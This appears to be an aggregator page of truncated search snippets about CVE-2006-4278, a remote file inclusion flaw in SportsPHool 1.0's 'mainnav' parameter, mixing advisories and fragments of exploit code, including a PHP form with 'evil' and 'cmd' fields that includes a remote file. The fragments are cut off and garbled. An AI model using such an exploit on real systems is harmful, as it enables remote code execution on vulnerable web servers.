SportsPHool <= 1.0 (mainnav) Remote File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '63866' ssvid version = '1.0' author = '皮皮' vulDate = '2006-08-21' createDate = '2015-12-24...

SportsPHool 1.0 - Remote File Inclusion

SportsPHool 1.0 - Remote File Inclusion " ."target:" ."evil:" ."cmd:" ."" .""; if !isset$POST'submit' echo $form; else $file = fopen "test.txt", "w+"; fwrite$file, ""; fclose$file; $file = fopen $target.$evil, "r"; if !$file echo "Unable to get output.\n"; exit; echo $form; while !feof $file $lin...

SportsPHool远程文件包含漏洞

SportsPHool是一款基于PHP的WEB应用程序。 SportsPHool不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'plain.footer.php'脚本对用户提交的'mainnav'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 SportsPHool SportsPHool 1.0 无...

CVE-2006-4278

PHP remote file inclusion vulnerability in includes/layout/plain.footer.php in SportsPHool 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the mainnav parameter...

CVE-2006-4278

PHP remote file inclusion vulnerability in includes/layout/plain.footer.php in SportsPHool 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the mainnav parameter...

CVE-2006-4278

The CVE-2006-4278 entry describes a PHP remote file inclusion vulnerability in SportsPHool 1.0. Specifically, includes/layout/plain.footer.php is vulnerable, allowing remote attackers to execute arbitrary PHP code by supplying a URL in the mainnav parameter. This behavior is documented in multipl...

[SA21594] SportsPHool &quot;mainnav&quot; File Inclusion Vulnerability

TITLE: SportsPHool "mainnav" File Inclusion Vulnerability SECUNIA ADVISORY ID: SA21594 VERIFY ADVISORY: http://secunia.com/advisories/21594/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: SportsPHool 1.x http://secunia.com/product/11629/ DESCRIPTION: Kacper has...

SportsPHool 1.0 - mainnav Remote File Inclusion

SportsPHool 1.0 - mainnav Remote File Inclusion / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - SportsPHool = 1.0 mainnav Remote File Include Vulnerability + + + - Script name: SportsPHool v.1.0 - Script site: http://sourceforge.net/projects/sportsphool + + + - Find by: Kacper a.k.a Rahim...

SportsPHool <= 1.0 (mainnav) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ============================================================== SportsPHool = 1.0 mainnav Remote File Include Vulnerability ============================================================== / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + +...

SportsPHool 1.0 - &#039;mainnav&#039; Remote File Inclusion

/ + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - SportsPHool = 1.0 mainnav Remote File Include Vulnerability + + + - Script name: SportsPHool v.1.0 - Script site: http://sourceforge.net/projects/sportsphool + + + - Find by: Kacper a.k.a Rahim + - Contact: [email protected] - or -...

SportsPHool &lt;= 1.0 (mainnav) Remote File Include Vulnerability

No description provided by source. / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - SportsPHool = 1.0 mainnav Remote File Include Vulnerability + + + - Script name: SportsPHool v.1.0 - Script site: http://sourceforge.net/projects/sportsphool + + + - Find by: Kacper a.k.a Rahim + - Contact:...